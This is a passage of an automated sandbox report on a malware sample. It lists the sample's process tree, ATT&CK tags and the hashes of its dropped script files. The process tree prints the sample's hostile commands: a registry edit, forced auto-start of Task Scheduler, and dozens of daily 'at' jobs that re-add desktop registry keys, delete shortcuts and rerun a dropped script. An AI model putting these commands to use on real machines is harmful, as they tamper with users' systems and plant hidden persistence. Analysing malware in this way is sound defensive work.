  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
      4⤵
      PID:1380
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\copy.cmd
    3⤵
    - Drops file in Program Files directory
    PID:1772
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\run.cmd
    3⤵
    PID:564
  - - C:\Windows\SysWOW64\sc.exe
      sc config Schedule start= auto
      4⤵
      Launches sc.exe
      PID:1612
  - - C:\Windows\SysWOW64\net.exe
      net start "Task Scheduler"
      4⤵
      PID:1568
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start "Task Scheduler"
        5⤵
        
        PID:1104
  - - C:\Windows\SysWOW64\at.exe
      at 8:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1784
  - - C:\Windows\SysWOW64\at.exe
      at 8:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:872
  - - C:\Windows\SysWOW64\at.exe
      at 8:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:1544
  - - C:\Windows\SysWOW64\at.exe
      at 9:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1140
  - - C:\Windows\SysWOW64\at.exe
      at 9:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:1984
  - - C:\Windows\SysWOW64\at.exe
      at 9:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:1924
  - - C:\Windows\SysWOW64\at.exe
      at 10:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1988
  - - C:\Windows\SysWOW64\at.exe
      at 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:1632
  - - C:\Windows\SysWOW64\at.exe
      at 10:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:1628
  - - C:\Windows\SysWOW64\at.exe
      at 11:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:984
  - - C:\Windows\SysWOW64\at.exe
      at 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:1380
  - - C:\Windows\SysWOW64\at.exe
      at 11:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:272
  - - C:\Windows\SysWOW64\at.exe
      at 12:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1716
  - - C:\Windows\SysWOW64\at.exe
      at 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:552
  - - C:\Windows\SysWOW64\at.exe
      at 12:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:1532
  - - C:\Windows\SysWOW64\at.exe
      at 13:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1540
  - - C:\Windows\SysWOW64\at.exe
      at 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:316
  - - C:\Windows\SysWOW64\at.exe
      at 13:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:1312
  - - C:\Windows\SysWOW64\at.exe
      at 14:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:540
  - - C:\Windows\SysWOW64\at.exe
      at 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:1996
  - - C:\Windows\SysWOW64\at.exe
      at 14:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:1976
  - - C:\Windows\SysWOW64\at.exe
      at 15:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1084
  - - C:\Windows\SysWOW64\at.exe
      at 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:536
  - - C:\Windows\SysWOW64\at.exe
      at 15:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:1644
  - - C:\Windows\SysWOW64\at.exe
      at 16:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1000
  - - C:\Windows\SysWOW64\at.exe
      at 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:1128
  - - C:\Windows\SysWOW64\at.exe
      at 16:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:1480
  - - C:\Windows\SysWOW64\at.exe
      at 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1620
  - - C:\Windows\SysWOW64\at.exe
      at 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:608
  - - C:\Windows\SysWOW64\at.exe
      at 17:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:988
  - - C:\Windows\SysWOW64\at.exe
      at 18:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1900
  - - C:\Windows\SysWOW64\at.exe
      at 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:2036
  - - C:\Windows\SysWOW64\at.exe
      at 18:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:560
  - - C:\Windows\SysWOW64\at.exe
      at 19:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:452
  - - C:\Windows\SysWOW64\at.exe
      at 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:1496
  - - C:\Windows\SysWOW64\at.exe
      at 19:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:1784
  - - C:\Windows\SysWOW64\at.exe
      at 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1000
  - - C:\Windows\SysWOW64\at.exe
      at 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:1532
  - - C:\Windows\SysWOW64\at.exe
      at 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:284
  - - C:\Windows\SysWOW64\at.exe
      at 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1028
  - - C:\Windows\SysWOW64\at.exe
      at 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:584
  - - C:\Windows\SysWOW64\at.exe
      at 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:2020
  - - C:\Windows\SysWOW64\at.exe
      at 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:988
  - - C:\Windows\SysWOW64\at.exe
      at 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:984
  - - C:\Windows\SysWOW64\at.exe
      at 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:1976
  - - C:\Windows\SysWOW64\at.exe
      at 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:272
  - - C:\Windows\SysWOW64\at.exe
      at 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:1104
  - - C:\Windows\SysWOW64\at.exe
      at 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:1180
  - - C:\Windows\SysWOW64\at.exe
      at 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:804
  - - C:\Windows\SysWOW64\at.exe
      at 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
      4⤵
      PID:1000
  - - C:\Windows\SysWOW64\at.exe
      at 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1480
  - - C:\Windows\SysWOW64\at.exe
      at 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*└└*.*"
      4⤵
      PID:1940
  - - C:\Windows\SysWOW64\at.exe
      at 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*└└*.*"
      4⤵
      PID:1280
  - - C:\Windows\SysWOW64\at.exe
      at 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdls\is.cmd
      4⤵
      PID:952
  - - C:\Windows\SysWOW64\at.exe
      at 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:1708
  - - C:\Windows\SysWOW64\at.exe
      at 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*└└*.*"
      4⤵
      PID:892
  - - C:\Windows\SysWOW64\at.exe
      at 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*└└*.*"
      4⤵
      PID:2036
  - - C:\Windows\SysWOW64\at.exe
      at 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdls\is.cmd
      4⤵
      PID:1672
  - - C:\Windows\SysWOW64\at.exe
      at 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*└└*.*"
      4⤵
      PID:1568
  - - C:\Windows\SysWOW64\at.exe
      at 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*└└*.*"
      4⤵
      PID:872
  - - C:\Windows\SysWOW64\at.exe
      at 19:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*└└*.*"
      4⤵
      PID:276
  - - C:\Windows\SysWOW64\at.exe
      at 19:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdls\is.cmd
      4⤵
      PID:1408
  - - C:\Windows\SysWOW64\at.exe
      at 19:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*└└*.*"
      4⤵
      PID:1988
  - - C:\Windows\SysWOW64\at.exe
      at 21:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*└└*.*"
      4⤵
      PID:1128
  - - C:\Windows\SysWOW64\at.exe
      at 21:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*└└*.*"
      4⤵
      PID:340
  - - C:\Windows\SysWOW64\at.exe
      at 21:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdls\is.cmd
      4⤵
      PID:1004
  - - C:\Windows\SysWOW64\at.exe
      at 21:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*└└*.*"
      4⤵
      PID:1676
  - - C:\Windows\SysWOW64\at.exe
      at 9:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
      4⤵
      PID:1656
  - - C:\Windows\SysWOW64\at.exe
      at 14:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
      4⤵
      PID:948
  - - C:\Windows\SysWOW64\at.exe
      at 18:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
      4⤵
      PID:1152
  - - C:\Windows\SysWOW64\at.exe
      at 21:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
      4⤵
      PID:432

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\361.cmd

Filesize
1KB

MD5
2621fc7053aa3d34d8216327d92f5445

SHA1
550cbca926154543ead3c474d6feb7e3346933dd

SHA256
5b824fdc1593ff8da084df3dd0102bc4133e91ce90de46be15f661111ad9bff8

SHA512
e80fd9d2232d9456337ab5c7c626d6d4339ab123d3aa8e5d116f2dda5784fd82056b27de888f8459dcd2f83c4b95d84a88768831b59b5e6abb2fca4ab7056990

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7xdown.vbs

Filesize
334B

MD5
ebecf7e7ab396f7d3befc5b1beaa1698

SHA1
fc7504d29bafdbcf2057ce06fc1ac8d37b306071

SHA256
0bbea4b97fa47f10fcaff80f1233850e2d077d0355d4dc0faa75690e8ef9d2de

SHA512
a51fa5dcdff77340d0dfedc67b6e1ed467a57d1a96680d565acbd7f163dc5141a87f1df54ebc96340349f186bf2dbc600f7e4f5a96a95ee1df004be76a0e6901

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\copy.cmd

Filesize
271B

MD5
79479b9b40967c6bbc24009b58c42a99

SHA1
3429c87085b28f5ff01fc20a471f2a6788b176ba

SHA256
9ffe68e158702dab33e8f577dd3c495b232f03f1fbeb6c98dd72985cfa9e3994

SHA512
9d5da82de10f23150a85e838f4fa549a255b6a0d9795c2a3d31fffae115177f0e5df028bdd07240adb464ebd488cbbdc27bdb64e18b6dceb742b6ac98581bd5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\is.cmd

Filesize
99B

MD5
0470728c8fecaef349dda7299ed76e14

SHA1
b000979a137b7c2170b77abe5a6ef4d3902064a3

SHA256
e53a206f477a91c49f506efdbb2dbeb594d3f5bbf23ac9aedc569ddc3427c0a2

SHA512
8780dd5879f2c3f13f7712a0ebd92415844836293f5ced5500b4dc7471549f162b8277647e4f5243e197457fc2a3ed71fed3f4fa87bca9ff8724aafe14a26f21

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.cmd

Filesize
11KB

MD5
78128b79ee47844a39bc8b6a8eae5b9f

SHA1
0c4a0827270e0498d240a25a4cc445a3f1828d92

SHA256
52f3f8b761db5b156a3285f4bb34883f993f9f0d449c4c687b15c5f40f6d2ab8

SHA512
f4981d2cfe08028a764d600f3023e46ddb338a3a0083bf5c0b7ac01709e12defc821f753ef31431a4c2f9b82b064ec36829dafef498f489cc091820d0a49d85d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\to.cmd

Filesize
3KB

MD5
0ebfdd6ce52cd28aff0aba4432375c1f

SHA1
0f583b89f37e0f1b10a23f4e7a90121a2e783706

SHA256
6e8c00dc480136d970b98f60962b926b03d16d2606cbe3bd5e7a0d4bd61ab373

SHA512
7ad6ea2eaff9b400044b10b3ea17881e4b0ba5ce38c8c3c11cd5d701a558821159cd3660706cc06ccaf36d1388817eaffa8fd6d5f9f2dbe52c61f14b6480892d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\winare.vbs

Filesize
695B

MD5
fbce8f5de4086b94666402d2e13739cb

SHA1
6bba41c928ed4267e516f3e369471d926e3ae104

SHA256
5a9df2479fcd1eb5bbdf1c65e0d1aec95e4223bd83dae9775c621ccc47997dd2

SHA512
6bcd9bd51f9a131f98506b60aa2c0edc7d6ff1f01257227dd58988b9a78f7454daab4ed1fc94520ba09eea99602b29d357ad44efc3409255cb997da24f33d46f

Download Submit
memory/1264-54-0x0000000075601000-0x0000000075603000-memory.dmp

Filesize
8KB

Download